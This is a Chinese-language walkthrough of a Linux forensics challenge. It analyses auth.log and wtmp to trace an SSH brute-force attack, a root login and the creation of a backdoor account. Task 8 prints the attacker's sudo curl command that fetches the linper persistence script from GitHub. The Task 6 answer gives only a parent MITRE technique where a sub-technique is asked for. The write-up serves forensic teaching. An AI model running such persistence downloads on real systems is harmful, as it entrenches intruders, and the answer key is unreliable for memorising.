类别:linux取证、DFIR
此靶场提供了两个文件:auth.log,wtmp
这个靶场的考点主要是关于linux下auth.log、wtmp文件的知识点,可以增加对auth.log文件的认识,也是在取证中比较常看的日志文件。
auth.log文件是Linux系统中用于记录与身份验证相关的日志文件,特别是在基于Debian的发行版上。它主要记录了系统的身份验证事件,包括成功和失败的登录尝试、用户切换、sudo 命令使用、SSH 连接等。
auth.log的各个字段介绍:
Aug 8 12:34:56 hostname sshd[12345]: Failed password for root from 192.168.1.100 port 54321 ssh2
WTMP文件
wtmp文件在mac上可以使用utmpdump工具查看,在linux服务器上如果查看wtmp日志,则使用last
命令即可。
utmpdump
的输出包含了从wtmp
文件的二进制格式解码的多个字段。 下面是各个字段的介绍:
Task1 通过查看 auth.log 日志,我们能否找出攻击者在进行暴力破解时所使用的 IP 地址?
cat auth.log | grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" -r xxx --color=auto | grep "Invalid user"
65.2.161.68
Task2 通过蛮力攻击,攻击者成功地侵入了服务器上的一个账户。那么,这个账户的用户名是什么呢?
root
Task3 你能确定攻击者亲自登录服务器执行其计划的具体时间点吗?
有时差,得减8,14:32:45 - 8:00:00 = 06:32:45
2024-03-06 06:32:45
Task4 SSH 会话在用户登录时进行追踪,并为每个会话分配一个编号。在问题 2 描述的情境中,攻击者使用的账户登录后,其会话被赋予了哪个编号呢?
cat auth.log | grep "root"
37
Task5 攻击者为了在服务器上长期保持控制权,创建了一个新的用户账号,并为这个账号设置了更高的权限等级。那么,这个账号的名称是什么呢?
cat auth.log | grep "Accept"
cyberjunkie
Task6 MITRE ATT&CK 持久化所用的子技术ID是什么?
https://attack.mitre.org/techniques/T1136
Task7 根据之前确认的登录时间以及在认证日志文件中记录的会话结束时间,我们可以计算出攻击者首次通过SSH连接的持续时长是多少秒?
从32.45到37:24
240+39
Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
Mar 6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.
Task8 攻击者登录了他们的后门账户,并利用其更高权限下载了一个脚本。使用 sudo 执行的完整命令是什么?
/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh